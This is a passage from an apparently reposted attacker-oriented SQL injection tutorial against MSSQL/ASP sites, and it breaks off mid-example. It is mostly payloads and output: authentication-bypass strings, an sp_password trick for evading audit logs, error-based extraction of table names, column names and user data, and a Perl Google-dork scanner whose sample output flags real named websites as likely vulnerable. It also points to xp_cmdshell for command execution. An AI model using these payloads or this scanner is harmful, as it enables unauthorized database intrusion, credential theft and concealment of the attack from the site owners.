SQL query &lt;br /&gt; in order to alter the outcome of the query. Take the example of an application that requests a user id &lt;br /&gt; for authentication. The application adds this user ID to a predefined SQL query to perform authentication. &lt;br /&gt; &lt;br /&gt;  However, if instead of providing a valid user name the attacker inputs a specialized SQL command &lt;br /&gt; that forces the termination of the predefined SQL query and forces the execution of a new SQL query. In this &lt;br /&gt; way the attacker can execute any SQL command on the host system without even needing to log in. &lt;br /&gt; &lt;br /&gt;  A successful SQL injection exploit can read sensitive data from the database, modify database data &lt;br /&gt; (Insert/Update/Delete), execute administration operations on the database (such shutdown the DBMS), recover &lt;br /&gt; the content of a given file present on the DBMS filesystem and in some cases issue commands to the operating system. &lt;br /&gt; &lt;br /&gt;  An application is vulnerable to SQL injection attack when:&lt;br /&gt;   - User input is incorrectly filtered for string literal escape characters embedded in SQL statements.&lt;br /&gt;   - User input is either not restricted ? e.g. through strong typing - and thereby can be made to execute&lt;br /&gt;     in an unexpected manner&lt;br /&gt; &lt;br /&gt;  SQL Injection always occur in application that needs to talk to a Database include:&lt;br /&gt;   - Authentication forms (Login Pages)&lt;br /&gt;   - Search forms&lt;br /&gt;   - E-Commerce sites&lt;br /&gt;   - Forum / Webboard&lt;br /&gt;   - Content Manage System (CMS's that use DB),Such as: &lt;br /&gt;    Joomla Components (http://www.milw0rm.com/search.php?dong=joomla)&lt;br /&gt;    Mambo Components (http://www.milw0rm.com/search.php?dong=mambo)&lt;br /&gt;    Wordpress Plugin (http://www.milw0rm.com/search.php?dong=wordpress)&lt;br /&gt;&lt;br /&gt; &lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x01b] - How to Test sites that are vulnerable in SQL Injection&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt; &lt;br /&gt;  We must make a list of all input fields whose values could be used in crafting a SQL query, &lt;br /&gt; including the hidden fields of POST requests and then test them separately, trying to interfere with &lt;br /&gt; the query and to generate an error. The very first test usually consists of adding a single quote (') &lt;br /&gt; , double quote ("") or a semicolon (;) to the field under test. &lt;br /&gt; &lt;br /&gt; [Simple URL] http://www.example.com/news.asp?id=10&lt;br /&gt; [Test SQLi]  http://www.example.com/news.asp?id=10'&lt;br /&gt;&lt;br /&gt;  It's vulnerable in SQL injection,If the output some error like this:&lt;br /&gt; &lt;br /&gt; [HTTP Response]-----------------------------------------------------------------------------&lt;br /&gt; Microsoft OLE DB Provider for ODBC Drivers error '80040e14'&lt;br /&gt; [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the &lt;br /&gt; character string ''.&lt;br /&gt; /news.asp, line 52&lt;br /&gt; [End HTTP Response]-------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  Next solution, Use "OR/AND" Operation for testing SQL injection vulnerability:&lt;br /&gt; &lt;br /&gt;  If contains is the different as original URL that dump all data &lt;br /&gt; from database, It's vulnerable in SQL injection.&lt;br /&gt;&lt;br /&gt; [Simple URL] http://www.example.com/news.asp?id=2&lt;br /&gt;&lt;br /&gt; [output]------------------------------------------------------------------------------------&lt;br /&gt; News: 2&lt;br /&gt; Details: Preventing blind SQL injection attacks, Most security professionals know ... &lt;br /&gt; [End Output]--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [Test SQLi] http://www.example.com/news.asp?id=2' or '1'='1&lt;br /&gt;&lt;br /&gt; [output]------------------------------------------------------------------------------------&lt;br /&gt; News: 1&lt;br /&gt; Details: SQL injection attack infects hundreds of thousands of websites ...&lt;br /&gt;&lt;br /&gt; News: 2&lt;br /&gt; Details: Preventing blind SQL injection attacks, Most security professionals know ... &lt;br /&gt; &lt;br /&gt; News: 3&lt;br /&gt; Details: Mass SQL injection, There's another round of mass SQL injections going on which has infected ...&lt;br /&gt; &lt;br /&gt; News: 4&lt;br /&gt; Details: New Botnet Malware Spreading SQL injection attack tool ...&lt;br /&gt; [End Output]--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  That's Great !! Can you see something different from original URL ? (It's Vuln in SQL Injection Attacks),&lt;br /&gt; It's return all query from DB, Why ??&lt;br /&gt;&lt;br /&gt; [ASP_code]&lt;br /&gt; var sql = "SELECT * FROM news WHERE id = '" + getid +"'";&lt;br /&gt; [End ASP_code]&lt;br /&gt;&lt;br /&gt; [Final query //id=2]&lt;br /&gt; SELECT * FROM news WHERE id = '2'  // It's will return News 2&lt;br /&gt; [End id=2]&lt;br /&gt;&lt;br /&gt; [Final query //id=2' or 'a'='a]   // Testing SQLi Vuln&lt;br /&gt; SELECT * FROM news WHERE id = '2' or 'a'='a' // It's include ' or 'a'='a into SQL statement and the condition is TRUE,&lt;br /&gt;       //  So It will return all news (id=1,2,3,...)&lt;br /&gt; [End id=2' or 'a'='a]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x01c] - Bypass Authentication with SQL Injection&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  This basic technique for "bypass Login" when application use DB to checking authentication.&lt;br /&gt; However, an attacker may possibly bypass this check with SQL injection.&lt;br /&gt; &lt;br /&gt; [Example scripts]&lt;br /&gt;&lt;br /&gt; +-----------------------------+&lt;br /&gt; |   ' or 1=1 --       |&lt;br /&gt; |   a' or 1=1 --       |&lt;br /&gt; |   " or 1=1 --       |&lt;br /&gt; |   a" or 1=1 --       |&lt;br /&gt; |   ' or 1=1 #       |&lt;br /&gt; |   " or 1=1 #       |&lt;br /&gt; |   or 1=1 --       |&lt;br /&gt; |   ' or 'x'='x       |&lt;br /&gt; |   " or "x"="x       |&lt;br /&gt; |   ') or ('x'='x       |&lt;br /&gt; |   ") or ("x"="x       |&lt;br /&gt; | ' or username LIKE '%admin% |&lt;br /&gt; +-----------------------------+&lt;br /&gt; |      USERNAME:  ' or 1/*    |&lt;br /&gt; |      PASSWORD:  */ =1 --    |&lt;br /&gt; +-----------------------------+&lt;br /&gt; |  USERNAME: admin' or 'a'='a |&lt;br /&gt; |  PASSWORD: '#        |&lt;br /&gt; +-----------------------------+&lt;br /&gt;&lt;br /&gt; [Login ASP_code]----------------------------------------------------------------------------&lt;br /&gt; var sql = "SELECT * FROM users WHERE username = '" + formusr + "' AND password ='" + formpwd + "'";&lt;br /&gt; [End Login ASP_code]------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  When we input something like this:&lt;br /&gt;  formusr = admin&lt;br /&gt;  formpwd = ' or 'a='a&lt;br /&gt;&lt;br /&gt; [SQL Query]---------------------------------------------------------------------------------&lt;br /&gt; SELECT * FROM users WHERE username = 'admin' AND password = '' or 'a'='a'&lt;br /&gt; [End Code]----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  This SQL condition is TRUE and bypass login process, So you don't need admin's password. (Just use ' or 'a'='a)&lt;br /&gt;&lt;br /&gt;  If we input something like this&lt;br /&gt;  formusr = ' or 1=1 -- &lt;br /&gt;  formpwd = anything&lt;br /&gt; &lt;br /&gt; [SQL Query]---------------------------------------------------------------------------------&lt;br /&gt; SELECT * FROM users WHERE username = '' or 1=1 -- AND password = 'anything'&lt;br /&gt; [End Code]----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  ** Note **&lt;br /&gt;&lt;br /&gt;  --  is comment operator of MSSQL DB used to comment out everything following this operator.&lt;br /&gt;  /*Comment*/ Inline comment, Comments out rest of the query by not closing them / Bypass blacklisting.&lt;br /&gt;    &lt;br /&gt;    DROP/*comment*/sampletable &lt;br /&gt;    DR/**/OP/*bypass blacklisting*/sampletable &lt;br /&gt;    SELECT/*avoid-spaces*/password/**/FROM/**/Members&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then&lt;br /&gt; you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash &lt;br /&gt; of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.&lt;br /&gt;  &lt;br /&gt;  formusr = admin &lt;br /&gt;  formpwd = pass ' AND 1=2 UNION ALL SELECT 'admin', '1a1dc91c907325c69271ddf0c944bc72&lt;br /&gt;&lt;br /&gt; 1a1dc91c907325c69271ddf0c944bc72 = MD(pass)&lt;br /&gt;&lt;br /&gt; +++++++++++++++++++++++++++++&lt;br /&gt;  [0x01d] - Audit Log Evasion&lt;br /&gt; +++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  When we injection some code with SQLi Techniques, All of the SQL queries can be logged and admin can know what's happen ?&lt;br /&gt; The technique for evade logging, We use "sp_password"&lt;br /&gt;&lt;br /&gt;  formusr = ' or 1=1 -- sp_password&lt;br /&gt;  formpwd = anything&lt;br /&gt;&lt;br /&gt;  SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries &lt;br /&gt; it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible).&lt;br /&gt;&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x01e] - (Perl Script) SQL-Google searching vulnerable sites&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt; &lt;br /&gt;  The Good way to searching sites that have SQL injection vulnerability is "Google" &lt;br /&gt; (That powerful to use every search engines to searching with IRCbots). We developed simple Perl script for&lt;br /&gt; searching SQL injection holes (MSSQL, Mysql, MS Access, Oracle) name "SQL-Google Search":&lt;br /&gt;&lt;br /&gt; [code]-----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; #!/usr/bin/perl&lt;br /&gt; use LWP::Simple;&lt;br /&gt; use LWP::UserAgent;&lt;br /&gt; use HTTP::Request;&lt;br /&gt; my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } &lt;br /&gt; print "+++++++++++++++++++++++++++++++\n";&lt;br /&gt; print "+     SQL - Google Search     +\n";&lt;br /&gt; print "+       CWH Underground       +\n";&lt;br /&gt; print "+++++++++++++++++++++++++++++++\n\n";&lt;br /&gt; print "Insert Dork:";&lt;br /&gt; chomp( my $dork = &lt;stdin&gt; );&lt;br /&gt; print "Total Query Pages (10 Links/Pages) :";&lt;br /&gt; chomp( my $page = &lt;stdin&gt; );&lt;br /&gt; print "\n[+] Result:\n\n";&lt;br /&gt; for($start = 0;$start != $page*10;$start += 10)&lt;br /&gt; { &lt;br /&gt; $t = "http://www.google.com/search?hl=en&amp;amp;q=".$dork."&amp;amp;btnG=Search&amp;amp;start=".$start;&lt;br /&gt;     $ua = LWP::UserAgent-&amp;gt;new(agent =&amp;gt; 'Mozilla 5.2');&lt;br /&gt;     $ua-&amp;gt;timeout(10);&lt;br /&gt;     $ua-&amp;gt;env_proxy;&lt;br /&gt;     $response = $ua-&amp;gt;get($t);&lt;br /&gt;     if ($response-&amp;gt;is_success)&lt;br /&gt;     {&lt;br /&gt;         $c = $response-&amp;gt;content;&lt;br /&gt;         @stuff = split(/&lt;a href="http://www.blogger.com/,$c);%3Cbr"&gt;         foreach $line(@stuff)&lt;br /&gt;         {&lt;br /&gt;             if($line =~/(.*) class=l/ig)&lt;br /&gt;             {&lt;br /&gt;                 $out = $1;&lt;br /&gt;                 $out =~ s/\"//g;&lt;br /&gt;   $out =~s/$/\'/;    &lt;br /&gt;   $ua = LWP::UserAgent-&amp;gt;new(agent =&amp;gt; 'Mozilla 5.2');&lt;br /&gt;   $ua-&amp;gt;timeout(10);&lt;br /&gt;   $ua-&amp;gt;env_proxy;&lt;br /&gt;   $response = $ua-&amp;gt;get($out);&lt;br /&gt;   $error = $response-&amp;gt;content();&lt;br /&gt;   if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)&lt;br /&gt;    {print "$out =&amp;gt; Could be Vulnerable in MySQL Injection!!\n";}&lt;br /&gt;   elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)&lt;br /&gt;    {print "$out =&amp;gt; Could be Vulnerable in MS Access Injection!!\n";}&lt;br /&gt;   elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)&lt;br /&gt;    {print "$out =&amp;gt; Could be Vulnerable in MSSQL Injection!!\n";}&lt;br /&gt;   elsif($error =~m/Microsoft OLE DB Provider for Oracle/)&lt;br /&gt;    {print "$out =&amp;gt; Could be Vulnerable in Oracle Injection!!\n";}&lt;br /&gt;      }&lt;br /&gt;  }&lt;br /&gt;     }&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt; [End code]----------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt; [output]------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt; +++++++++++++++++++++++++++++++&lt;br /&gt; +     SQL - Google Search     +&lt;br /&gt; +       CWH Underground       +&lt;br /&gt; +++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt; Insert Dork:index.asp?sid=&lt;br /&gt; Total Query Pages (10 Links/Pages) :5&lt;br /&gt;&lt;br /&gt; [+] Result:&lt;br /&gt;&lt;br /&gt; http://www.ris.org.uk/index.asp?sid=7&amp;amp;mid=5' =&amp;gt; Could be Vulnerable in MSSQL Injection!!&lt;br /&gt; http://www.waterbucket.ca/rm/index.asp?type=single&amp;amp;sid=44&amp;amp;id=307' =&amp;gt; Could be Vulnerable in MSSQL Injection!!&lt;br /&gt; http://www.ilri.org/research/Index.asp?SID=4' =&amp;gt; Could be Vulnerable in MSSQL Injection!!&lt;br /&gt; &lt;br /&gt; [End output]--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;############################################&lt;br /&gt; [0x02] - MSSQL Normal SQL Injection Attack&lt;br /&gt;############################################&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  &lt;br /&gt;  We can use information from error message produced by the MS SQL Server to get almost any data we want. &lt;br /&gt; &lt;br /&gt; - "GROUP BY" is a microsoft sql server command used to group output of particular sql query.&lt;br /&gt; - "HAVING" is a command used to specify a search condition for a group or an aggregate. &lt;br /&gt;   this command is always used with "GROUP BY" otherwise the error will return.&lt;br /&gt;&lt;br /&gt;  As the operation of these two commands, we can take advantage of them in order to &lt;br /&gt; obtain particular table name and all column names of this table. We will explain you by using an example.&lt;br /&gt;&lt;br /&gt;  First, The target has a table called "news" and in news, there are three columns, which are news_id, news_author and news_detail.&lt;br /&gt; &lt;br /&gt; The vulnerable page is http://www.example.com/page.asp?id=1&lt;br /&gt; The query in this page is something like &lt;br /&gt;&lt;br /&gt;  [Query]-----------------------------------------------------------------------------&lt;br /&gt;  var query = "SELECT * FROM news WHERE news_id= '" + column+ "'";&lt;br /&gt;  [End query]-------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; So, we can inject HAVING command in order to observe returned error&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1' HAVING 1=1--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; The query will be &lt;br /&gt;&lt;br /&gt;  SELECT * FROM news WHERE news_id='1' HAVING 1=1--'&lt;br /&gt;&lt;br /&gt; We will get the error as following:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft OLE DB Provider for SQL Server error '80040e14'&lt;br /&gt;  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in &lt;br /&gt;  the select list because it is not contained in an aggreate function and there is no GROUP BY clause. &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; In this error, we know table name = "news", used in this page and &lt;br /&gt; one column name = "news_id", contained in particular table.&lt;br /&gt; &lt;br /&gt; The error is originate from using HAVING command without GROUP BY command. &lt;br /&gt; Moreover, we can get the other column names by using combination of GROUP BY and HAVING command.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1' GROUP BY news.news_id HAVING 1=1--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; The query will be&lt;br /&gt;&lt;br /&gt;  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id HAVING 1=1--'&lt;br /&gt;&lt;br /&gt; We will get the error&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft OLE DB Provider for SQL Server error '80040e14'&lt;br /&gt;  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid in &lt;br /&gt;  the select list because it is not contained in an aggreate function and there is no GROUP BY clause.&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; Now, we know the second column name of table1 = "news_author". The third column name can be obtained &lt;br /&gt; by adding the second column name in the previous query&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author HAVING 1=1--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; The query will be&lt;br /&gt;&lt;br /&gt;  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author HAVING 1=1--'&lt;br /&gt;&lt;br /&gt; The request will generate following error&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft OLE DB Provider for SQL Server error '80040e14'&lt;br /&gt;  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in &lt;br /&gt;  the select list because it is not contained in an aggreate function and there is no GROUP BY clause.&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; The third column name = "news_detail", pops up in returned error. If we had more columns, &lt;br /&gt; we could add news_detail in GROUP BY clause of previous request then we could get the forth column name.&lt;br /&gt;&lt;br /&gt; When we added all of column in GROUP BY clause, we will get normal result and&lt;br /&gt; we absolutely know that we obtained all column name in table1.&lt;br /&gt;&lt;br /&gt; As this example, the request below will generate no error.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; The query will be&lt;br /&gt;&lt;br /&gt;  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--'&lt;br /&gt;&lt;br /&gt; As no error return, we know that table1 consists of three columns which are "news_id", "news_author" and "news_detail".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x02b] - ODBC Error Message Attack with "CONVERT"&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  In our opinion, MSSQL expresses much information in returned error. It is useful for programmers to debug their application meanwhile &lt;br /&gt; it is valuable for many attackers, as seeing in previous section.&lt;br /&gt;&lt;br /&gt;  In this section, we provide another method of utilizing from MSSQL error through a command called "convert".&lt;br /&gt; convert command is used to convert between two data type and when the specific data cannot convert to another type, &lt;br /&gt; this command will return error. let see through an example:&lt;br /&gt;&lt;br /&gt; In this example, we show you how to obtain MSSQL_Version, DB_name, User_name.&lt;br /&gt;&lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt; Error Message returned:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 &lt;br /&gt;  22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) &lt;br /&gt;  ' to data type int.&lt;br /&gt;  /page.asp, line 9 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt; Now, We know the version of MSSQL and OS (Windows 2003 Server), Let's go to enumerate DB_name.&lt;br /&gt;&lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt; Error Message returned:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'cwhdb' to data type int.&lt;br /&gt;  /page.asp, line 9&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We can know the Database name = "cwhdb", Next is query for get current user that run DB.&lt;br /&gt;&lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; Error Message returned:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'sa' to data type int.&lt;br /&gt;  /showthread.asp, line 9&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; W00t!! W00t!!, It use "sa" privileges lol. This information can help us that we can use extended &lt;br /&gt; stored procedure "XP_CMDSHELL" to run arbitrary command executes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; In next example, we show you how to obtain table names, column names and data.&lt;br /&gt;&lt;br /&gt; Take a look at our First request&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; "information_schema.tables" stores information about tables in databases and there is a field called "table_name" &lt;br /&gt; which stores names of each table. The result of this request is something like this:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'threads' to data type int.&lt;br /&gt;  /page.asp, line 9 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  From the query, we get threads as a nvarchar data type and as it cannot convert from threads to int data type, the error is returned.&lt;br /&gt; Therefore, we know the first table = "threads", from this error. The next step is looking for the second table. &lt;br /&gt; We only put WHERE clause append the query in above request.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+&lt;br /&gt;  not+in+('threads')))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We will get an error like this:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'users' to data type int.&lt;br /&gt;  /page.asp, line 9 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; Again, we know the second table = "users", from the error. If we want another table, we just append our known table list. for example,&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+&lt;br /&gt;  not+in+('threads','users')))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; And we will get an error:&lt;br /&gt;&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'forums' to data type int.&lt;br /&gt;  /page.asp, line 9&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; This means the third table = "forums". On the other hand, if the previous request return something like this.&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  ADODB.Field error '800a0bcd'&lt;br /&gt;  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.&lt;br /&gt;  /page.asp, line 10&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; It means this database consists of only two tables, threads and users.&lt;br /&gt;&lt;br /&gt;  OK, now, we already get all tables. The next target is column names.&lt;br /&gt; The method to retrieve column names is not much different from getting table names.&lt;br /&gt; We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"&lt;br /&gt; but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.&lt;br /&gt;&lt;br /&gt; Don't talk too much, let see an example&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; From this request, we get an following error&lt;br /&gt; &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'uname' to data type int.&lt;br /&gt;  /showthread.asp, line 9 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; As the same approach of getting table names, we abruptly know that the first column of table 'users' is "uname".&lt;br /&gt; For another column name, we add a bit in WHERE clause.&lt;br /&gt;&lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+&lt;br /&gt;  and+column_name+not+in+('uname')))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We will get an below error.&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'upass' to data type int.&lt;br /&gt;  /showthread.asp, line 9 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; Absolutely we know the second column = "upass", of table 'users'. For getting more column names, &lt;br /&gt; we only append a known table list like that in getting table names. For example,&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+&lt;br /&gt;  and+column_name+not+in+('uname','upass')))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; The Error message:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'email' to data type int.&lt;br /&gt;  /showthread.asp, line 9 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; So, the third column is "email". but if the error is&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  ADODB.Field error '800a0bcd'&lt;br /&gt;  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.&lt;br /&gt;  /page.asp, line 10 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; This means no more column left. Next is the real target which attackers want, the data.&lt;br /&gt; If take a look carefully, we will see that the idea is not different from getting table and column.&lt;br /&gt; Use the same manner but change only table and column name.&lt;br /&gt;&lt;br /&gt; If we want uname data in table users, we can do like this:&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We will see uname in returned error.&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed when converting the nvarchar value 'admin' to data type int.&lt;br /&gt;  /page.asp, line 9 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; Now, we know that there is 'admin' in column 'uname' of table 'users'. For another uname, &lt;br /&gt; we just create a known table list as table and column.&lt;br /&gt;&lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; Error again:&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e07'&lt;br /&gt;  Conversion failed 